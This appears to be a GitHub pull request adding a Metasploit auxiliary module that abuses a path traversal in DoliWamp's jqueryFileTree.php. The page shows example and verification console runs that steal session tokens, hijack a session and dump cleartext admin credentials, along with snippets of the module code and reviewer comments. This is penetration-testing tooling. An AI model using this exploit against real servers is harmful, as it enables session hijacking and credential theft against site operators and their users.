Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module #2940

Merged
merged 1 commit into from Feb 10, 2014

Conversation

Projects
None yet
2 participants
@bcoles
Contributor

bcoles commented Feb 3, 2014

Add DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials module.

Steals session tokens, attempts to hijack each session and gathers the user's username and password in clear text.

traversal

Example Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[+] 192.168.237.138:80 - Found credentials (admin:admin)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed

Example Verbose Output

msf> use auxiliary/gather/doliwamp_traversal_creds 
msf auxiliary(doliwamp_traversal_creds) > set RHOST 192.168.237.138
RHOST => 192.168.237.138
msf auxiliary(doliwamp_traversal_creds) > set VERBOSE true
VERBOSE => true
msf auxiliary(doliwamp_traversal_creds) > run

[*] 192.168.237.138:80 - Finding session tokens...
[+] 192.168.237.138:80 - Found 64 session tokens
[*] 192.168.237.138:80 - Trying to hijack a session...
[*] 192.168.237.138:80 - Trying to hijack a session -   1.56% done (1/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   3.12% done (2/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   4.69% done (3/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   6.25% done (4/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   7.81% done (5/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -   9.38% done (6/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  10.94% done (7/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  12.50% done (8/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  14.06% done (9/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  15.62% done (10/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  17.19% done (11/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  18.75% done (12/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  20.31% done (13/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  21.88% done (14/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  23.44% done (15/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  25.00% done (16/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  26.56% done (17/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  28.12% done (18/64 tokens)
[+] 192.168.237.138:80 - Hijacked session for user with ID '1'
[*] 192.168.237.138:80 - Retrieving user's credentials
[+] 192.168.237.138:80 - Found credentials (admin:admin)
[*] 192.168.237.138:80 - Trying to hijack a session -  29.69% done (19/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  31.25% done (20/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  32.81% done (21/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  34.38% done (22/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  35.94% done (23/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  37.50% done (24/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  39.06% done (25/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  40.62% done (26/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  42.19% done (27/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  43.75% done (28/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  45.31% done (29/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  46.88% done (30/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  48.44% done (31/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  50.00% done (32/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  51.56% done (33/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  53.12% done (34/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  54.69% done (35/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  56.25% done (36/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  57.81% done (37/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  59.38% done (38/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  60.94% done (39/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  62.50% done (40/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  64.06% done (41/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  65.62% done (42/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  67.19% done (43/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  68.75% done (44/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  70.31% done (45/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  71.88% done (46/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  73.44% done (47/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  75.00% done (48/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  76.56% done (49/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  78.12% done (50/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  79.69% done (51/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  81.25% done (52/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  82.81% done (53/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  84.38% done (54/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  85.94% done (55/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  87.50% done (56/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  89.06% done (57/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  90.62% done (58/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  92.19% done (59/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  93.75% done (60/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  95.31% done (61/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  96.88% done (62/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session -  98.44% done (63/64 tokens)
[*] 192.168.237.138:80 - Trying to hijack a session - 100.00% done (64/64 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     admin     Yes    

[*] Credentials saved in: /root/.msf4/loot/20140111063740_default_192.168.237.138_dolibarr.travers_981990.csv
[*] Auxiliary module execution completed
+ vprint_good("#{peer} - Hijacked session for user with ID '#{user_id}'")
+ return user_id
+ else
+ # print_debug("#{peer} - Could not hijack session. Session is invalid.")

This comment has been minimized.

@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

Did you mean to leave this commented out? Looks like useful info for debugging purposes.

@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

Did you mean to leave this commented out? Looks like useful info for debugging purposes.

+ # Check for session tokens in 'tmp'
+ #
+ def check
+ get_session_tokens ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown

This comment has been minimized.

@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

You only should be using Unknown when you've failed to collected some info during the process due to a timeout or something. Your get_session_tokens method doesn't really turn that type of info, so all you can do is flag it Safe here.

@wchen-r7

wchen-r7 Feb 3, 2014

Contributor

You only should be using Unknown when you've failed to collected some info during the process due to a timeout or something. Your get_session_tokens method doesn't really turn that type of info, so all you can do is flag it Safe here.

@wchen-r7 wchen-r7 self-assigned this Feb 10, 2014

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Feb 10, 2014

Contributor

Processing.

Contributor

wchen-r7 commented Feb 10, 2014

Processing.

wchen-r7 added a commit that referenced this pull request Feb 10, 2014

@wchen-r7 wchen-r7 merged commit 9b9b2fa into rapid7:master Feb 10, 2014

1 check passed

default The Travis CI build passed
Details
@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Feb 10, 2014

Contributor

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes   
Contributor

wchen-r7 commented Feb 10, 2014

Verification:

msf auxiliary(doliwamp_traversal_creds) > run

[*] 10.*.***.***:8181 - Finding session tokens...
[+] 10.*.***.***:8181 - Found 8 session tokens
[*] 10.*.***.***:8181 - Trying to hijack a session...
[*] 10.*.***.***:8181 - Trying to hijack a session -  12.50% done (1/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  25.00% done (2/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  37.50% done (3/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  50.00% done (4/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  62.50% done (5/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  75.00% done (6/8 tokens)
[*] 10.*.***.***:8181 - Trying to hijack a session -  87.50% done (7/8 tokens)
[+] 10.*.***.***:8181 - Hijacked session for user with ID '1'
[*] 10.*.***.***:8181 - Retrieving user's credentials
[+] 10.*.***.***:8181 - Found credentials (admin:********)
[*] 10.*.***.***:8181 - Trying to hijack a session - 100.00% done (8/8 tokens)

Dolibarr User Credentials
=========================

 Username  Password  Admin  E-mail
 --------  --------  -----  ------
 admin     ********  Yes   

@bcoles bcoles deleted the bcoles:doliwamp_traversal_creds branch Apr 6, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment